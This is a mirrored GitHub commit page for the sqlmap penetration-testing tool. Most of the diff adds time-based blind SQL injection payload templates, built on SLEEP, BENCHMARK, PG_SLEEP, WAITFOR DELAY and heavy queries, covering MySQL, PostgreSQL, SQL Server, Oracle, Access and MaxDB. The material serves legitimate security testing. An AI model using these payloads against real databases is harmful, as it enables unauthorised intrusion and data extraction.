Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 2656b8f

Browse files
stamparmstamparm
committed
Merge branch 'master' of github.com:sqlmapproject/sqlmap
2 parents 655dd55 + 245bba5 commit 2656b8f

4 files changed

Lines changed: 321 additions & 12 deletions

File tree

_sqlmap.py

Lines changed: 0 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -14,13 +14,6 @@
1414
warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning)
1515
warnings.filterwarnings(action="ignore", category=DeprecationWarning)
1616

17-
try:
18-
import psyco
19-
psyco.full()
20-
psyco.profile()
21-
except ImportError:
22-
pass
23-
2417
from lib.controller.controller import start
2518
from lib.core.common import banner
2619
from lib.core.common import dataToStdout

doc/FAQ.pdf

-716 Bytes
Binary file not shown.

doc/README.pdf

222 Bytes
Binary file not shown.

xml/payloads.xml

Lines changed: 321 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -76,7 +76,7 @@ Tag: <test>
7676
2: Error-based SQL injection
7777
3: UNION query SQL injection
7878
4: Stacked queries SQL injection
79-
5: AND/OR time-based blind SQL injection
79+
5: Time-based blind SQL injection
8080
8181
Sub-tag: <level>
8282
From which level check for this test.
@@ -2836,20 +2836,217 @@ Formats:
28362836
<!-- End of OR time-based blind tests -->
28372837

28382838

2839+
<!-- Time-based blind tests - Parameter replace -->
2840+
<test>
2841+
<title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>
2842+
<stype>5</stype>
2843+
<level>3</level>
2844+
<risk>1</risk>
2845+
<clause>1,2,3</clause>
2846+
<where>3</where>
2847+
<vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
2848+
<request>
2849+
<payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
2850+
</request>
2851+
<response>
2852+
<time>[SLEEPTIME]</time>
2853+
</response>
2854+
<details>
2855+
<dbms>MySQL</dbms>
2856+
</details>
2857+
</test>
2858+
2859+
<test>
2860+
<title>MySQL time-based blind - Parameter replace (ELT)</title>
2861+
<stype>5</stype>
2862+
<level>4</level>
2863+
<risk>1</risk>
2864+
<clause>1,2,3</clause>
2865+
<where>3</where>
2866+
<vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
2867+
<request>
2868+
<payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
2869+
</request>
2870+
<response>
2871+
<time>[SLEEPTIME]</time>
2872+
</response>
2873+
<details>
2874+
<dbms>MySQL</dbms>
2875+
</details>
2876+
</test>
2877+
2878+
<test>
2879+
<title>MySQL time-based blind - Parameter replace (bool*int)</title>
2880+
<stype>5</stype>
2881+
<level>4</level>
2882+
<risk>1</risk>
2883+
<clause>1,2,3</clause>
2884+
<where>3</where>
2885+
<vector>([INFERENCE])*SLEEP([SLEEPTIME])</vector>
2886+
<request>
2887+
<payload>([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME])</payload>
2888+
</request>
2889+
<response>
2890+
<time>[SLEEPTIME]</time>
2891+
</response>
2892+
<details>
2893+
<dbms>MySQL</dbms>
2894+
</details>
2895+
</test>
2896+
2897+
<test>
2898+
<title>MySQL &gt;= 5.0 time-based blind - Parameter replace</title>
2899+
<stype>5</stype>
2900+
<level>3</level>
2901+
<risk>1</risk>
2902+
<clause>1,2,3</clause>
2903+
<where>3</where>
2904+
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
2905+
<request>
2906+
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
2907+
</request>
2908+
<response>
2909+
<time>[SLEEPTIME]</time>
2910+
</response>
2911+
<details>
2912+
<dbms>MySQL</dbms>
2913+
<dbms_version>&gt;= 5.0</dbms_version>
2914+
</details>
2915+
</test>
2916+
2917+
<test>
2918+
<title>MySQL &lt; 5.0 time-based blind - Parameter replace (heavy queries)</title>
2919+
<stype>5</stype>
2920+
<level>4</level>
2921+
<risk>2</risk>
2922+
<clause>1,2,3</clause>
2923+
<where>3</where>
2924+
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
2925+
<request>
2926+
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
2927+
</request>
2928+
<response>
2929+
<time>[DELAYED]</time>
2930+
</response>
2931+
<details>
2932+
<dbms>MySQL</dbms>
2933+
</details>
2934+
</test>
2935+
2936+
<!-- TODO: carry on editing these payloads -->
2937+
<test>
2938+
<title>PostgreSQL time-based blind - Parameter replace (GENERATE_SERIES)</title>
2939+
<stype>5</stype>
2940+
<level>3</level>
2941+
<risk>2</risk>
2942+
<clause>1,2,3</clause>
2943+
<where>3</where>
2944+
<vector>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
2945+
<request>
2946+
<payload>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
2947+
</request>
2948+
<response>
2949+
<time>[SLEEPTIME]</time>
2950+
</response>
2951+
<details>
2952+
<dbms>PostgreSQL</dbms>
2953+
</details>
2954+
</test>
2955+
2956+
<test>
2957+
<title>Microsoft SQL Server/Sybase time-based blind - Parameter replace</title>
2958+
<stype>5</stype>
2959+
<level>3</level>
2960+
<risk>1</risk>
2961+
<clause>1,3</clause>
2962+
<where>3</where>
2963+
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
2964+
<request>
2965+
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
2966+
</request>
2967+
<response>
2968+
<time>[SLEEPTIME]</time>
2969+
</response>
2970+
<details>
2971+
<dbms>Microsoft SQL Server</dbms>
2972+
<dbms>Sybase</dbms>
2973+
<os>Windows</os>
2974+
</details>
2975+
</test>
2976+
2977+
<test>
2978+
<title>Oracle time-based blind - Parameter replace</title>
2979+
<stype>5</stype>
2980+
<level>3</level>
2981+
<risk>1</risk>
2982+
<clause>1,3</clause>
2983+
<where>3</where>
2984+
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
2985+
<request>
2986+
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
2987+
</request>
2988+
<response>
2989+
<time>[SLEEPTIME]</time>
2990+
</response>
2991+
<details>
2992+
<dbms>Oracle</dbms>
2993+
</details>
2994+
</test>
2995+
2996+
<test>
2997+
<title>Microsoft Access time-based blind - Parameter replace</title>
2998+
<stype>5</stype>
2999+
<level>3</level>
3000+
<risk>1</risk>
3001+
<clause>1,3</clause>
3002+
<where>3</where>
3003+
<vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
3004+
<request>
3005+
<payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
3006+
</request>
3007+
<response>
3008+
<time>[SLEEPTIME]</time>
3009+
</response>
3010+
<details>
3011+
<dbms>Microsoft Access</dbms>
3012+
</details>
3013+
</test>
3014+
3015+
<test>
3016+
<title>SAP MaxDB time-based blind - Parameter replace</title>
3017+
<stype>5</stype>
3018+
<level>3</level>
3019+
<risk>1</risk>
3020+
<clause>1,3</clause>
3021+
<where>3</where>
3022+
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
3023+
<request>
3024+
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
3025+
</request>
3026+
<response>
3027+
<time>[SLEEPTIME]</time>
3028+
</response>
3029+
<details>
3030+
<dbms>SAP MaxDB</dbms>
3031+
</details>
3032+
</test>
3033+
<!-- End of time-based blind tests - Parameter replace -->
3034+
3035+
28393036
<!-- Time-based blind tests - GROUP BY and ORDER BY clauses -->
28403037
<test>
28413038
<title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title>
28423039
<stype>5</stype>
28433040
<level>3</level>
2844-
<risk>2</risk>
3041+
<risk>1</risk>
28453042
<clause>2,3</clause>
28463043
<where>1</where>
28473044
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
28483045
<request>
28493046
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
28503047
</request>
28513048
<response>
2852-
<time>[DELAYED]</time>
3049+
<time>[SLEEPTIME]</time>
28533050
</response>
28543051
<details>
28553052
<dbms>MySQL</dbms>
@@ -2858,7 +3055,7 @@ Formats:
28583055
</test>
28593056

28603057
<test>
2861-
<title>MySQL &lt; 5.0.12 boolean-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
3058+
<title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
28623059
<stype>5</stype>
28633060
<level>4</level>
28643061
<risk>2</risk>
@@ -2875,7 +3072,126 @@ Formats:
28753072
<dbms>MySQL</dbms>
28763073
</details>
28773074
</test>
2878-
<!-- TODO: add tests for other DBMSes -->
3075+
3076+
<test>
3077+
<title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clauses</title>
3078+
<stype>5</stype>
3079+
<level>3</level>
3080+
<risk>1</risk>
3081+
<clause>2,3</clause>
3082+
<where>1</where>
3083+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>
3084+
<request>
3085+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>
3086+
</request>
3087+
<response>
3088+
<time>[SLEEPTIME]</time>
3089+
</response>
3090+
<details>
3091+
<dbms>PostgreSQL</dbms>
3092+
<dbms_version>&gt; 8.1</dbms_version>
3093+
</details>
3094+
</test>
3095+
3096+
<test>
3097+
<title>PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
3098+
<stype>5</stype>
3099+
<level>4</level>
3100+
<risk>2</risk>
3101+
<clause>2,3</clause>
3102+
<where>1</where>
3103+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>
3104+
<request>
3105+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>
3106+
</request>
3107+
<response>
3108+
<time>[DELAYED]</time>
3109+
</response>
3110+
<details>
3111+
<dbms>PostgreSQL</dbms>
3112+
</details>
3113+
</test>
3114+
3115+
<test>
3116+
<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses</title>
3117+
<stype>5</stype>
3118+
<level>3</level>
3119+
<risk>1</risk>
3120+
<clause>2,3</clause>
3121+
<where>1</where>
3122+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
3123+
<request>
3124+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
3125+
</request>
3126+
<response>
3127+
<time>[SLEEPTIME]</time>
3128+
</response>
3129+
<details>
3130+
<dbms>Microsoft SQL Server</dbms>
3131+
<dbms>Sybase</dbms>
3132+
<os>Windows</os>
3133+
</details>
3134+
</test>
3135+
3136+
<test>
3137+
<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>
3138+
<stype>5</stype>
3139+
<level>4</level>
3140+
<risk>2</risk>
3141+
<clause>2,3</clause>
3142+
<where>1</where>
3143+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
3144+
<request>
3145+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
3146+
</request>
3147+
<response>
3148+
<time>[DELAYED]</time>
3149+
</response>
3150+
<details>
3151+
<dbms>Microsoft SQL Server</dbms>
3152+
<dbms>Sybase</dbms>
3153+
<os>Windows</os>
3154+
</details>
3155+
</test>
3156+
3157+
<test>
3158+
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses</title>
3159+
<stype>5</stype>
3160+
<level>3</level>
3161+
<risk>1</risk>
3162+
<clause>2,3</clause>
3163+
<where>1</where>
3164+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
3165+
<request>
3166+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
3167+
</request>
3168+
<response>
3169+
<time>[SLEEPTIME]</time>
3170+
</response>
3171+
<details>
3172+
<dbms>Oracle</dbms>
3173+
</details>
3174+
</test>
3175+
3176+
<test>
3177+
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
3178+
<stype>5</stype>
3179+
<level>4</level>
3180+
<risk>2</risk>
3181+
<clause>2,3</clause>
3182+
<where>1</where>
3183+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
3184+
<request>
3185+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
3186+
</request>
3187+
<response>
3188+
<time>[DELAYED]</time>
3189+
</response>
3190+
<details>
3191+
<dbms>Oracle</dbms>
3192+
</details>
3193+
</test>
3194+
<!-- TODO: if possible, add payload for Microsoft Access -->
28793195
<!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->
28803196

28813197

0 commit comments

Comments
 (0)